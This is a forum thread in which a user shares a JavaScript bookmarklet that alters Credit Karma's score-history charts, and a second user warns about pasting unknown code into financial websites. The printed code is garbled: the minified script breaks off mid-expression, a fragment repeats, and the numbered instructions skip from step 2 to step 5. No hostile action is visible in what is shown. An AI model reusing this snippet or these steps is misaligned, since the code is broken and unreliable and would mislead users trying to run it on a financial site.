Modifying Credit Karma for Verbose Charts

[jmwha]

If you don't use Credit Karma, this probably won't interest you much. If you do, and you update your score frequently, you may have noticed that you can click on one of the monthly data points and see the individual credit scores you received each month.

It's clear the individual data points are there, and while I know that I'm not looking at a FICO score, that doesn't stop the data-geek in me from wanting more details. I've posted a similar script previously. On top of updating to Credit Karma's latest code, this version also displays the day of the month a score was received. For more info about the script and the changes I've made, see the notes at the bottom.

There are two possible ways to use this: create a bookmark, or run it manually from your browser's console.

Creating a bookmark:​

1. Create a new bookmark in your browser. You can either create a bookmark of a page and then edit it, or create a new blank bookmark.
2. Copy this (hint: triple-click) and use it as your Location/URL:

javascript:{var ret=(function(a){a.fn.ckScoreHistory=function(b,c){var d=this.get(0),f=a(this).data("yaxismin")||null,e=a(this).data("yaxismax")||null,m=a(this).data("value"),j=a(this).data("scoretype"),n=[];if(!d)return!1;var q=CK.App.Common.TouchScreen.hasTouch,s=CK.App.Common.Charts.ScoreHistory.defaultSettings(m),r=10*Math.floor(s.seriesMin/10),y=10*Math.ceil(s.seriesMax/10),r=r-10>=f?r-10:r,y=y+10s.pointDiffThreshold/2?20:40>=x?5:10,D=v*s.numTicks,A=r+D=f&&y-D>=s.seriesMin&&y+v=f?r-10:r,y=y+10s.pointDiffThreshold/2?20:40>=x?5:10,D=v*s.numTicks,A=r+D=f&&y-D>=s.seriesMin&&y+v

5. Press enter.

6. Check out the charts.

Note: As CreditKarma changes their site, this method may, at some point, stop working altogether. It is up to them whether they do so in a way that intentionally makes this harder or only breaks it as necessary, while leaving an easy fix (or implements a variant of it, making it unnecessary). 

Note: If you're inclined to check the differences in my script to ensure I am not acting maliciously, please compare it to lines 303-312 of the 'myfinances' script loaded via edgecastcdn. The primary change is the complete removal of the variable 'g' which is replaced with the existing variable 'm'. I've also changed one date format to increase the usefulness of the on-hover chart tooltip. Finally, I resize the window, triggering a refresh on any already-displayed charts. The two versions above vary slightly in how they're wrapped: the console version just prevents 'undefined' from appearing, whereas the bookmarklet version must start with 'javascript:' and scope multiple statements.

 

[resjudicata]

@jmwha This code looks safe enough to me, but for the record, you should probably never copy-paste random JavaScript off the internet to run on a financial website.

 

[jmwha]

@resjudicata I can understand your concern. If someone else had done this and I stumbled across it, I would be hesitant to run it.

I've tried to be transparent about what I've done and how someone with some JavaScript knowledge could go about checking my work (which might be a bit easier with a JS beautifier and a diff utility).

I put a little time into this and would like to share my work with people who are interested in it. If you have suggestions about how I could do so more transparently, I'm open to them.

Caution is important, so I can understand why someone might not want to run this. I appreciate the "looks safe enough" classification, but would add that people should pay attention to whether posts have been edited.

 

[resjudicata]

@jmwha Sorry, I don't mean to disparage your work, or discourage people from using it. I just think that in general, we should not be encouraging end-users to run unknown JS code in their browsers.

There was a recent Facebook exploit that took this approach: http://www.neowin.net/news/new-facebook-exploit-hits-the-web

For anyone reading this, cjc343's code looks fine and is most likely safe to run. However, I am not a JS security expert and it's theoretically possible that cjc343 is a devilishly clever hacker who has hidden something malicious in safe-looking code.

 

[jmwha]

@resjudicata To be clear, I didn't take your post as disparaging my work. You brought up a legitimate concern and reddit will sometimes take a legitimate concern and blow it out of proportion, especially if the OP doesn't address the concern. Unfortunately, it's not a concern I can or have addressed, because any attempt by myself to address it suffers from the same trust concerns.

While I could do things like provide beautified versions and diffs of Credit Karma's code and mine, that still relies on trusting me to have faithfully provided each. I opted not to do so because anyone who is able to compare them should be beautifying and diffing the code themselves.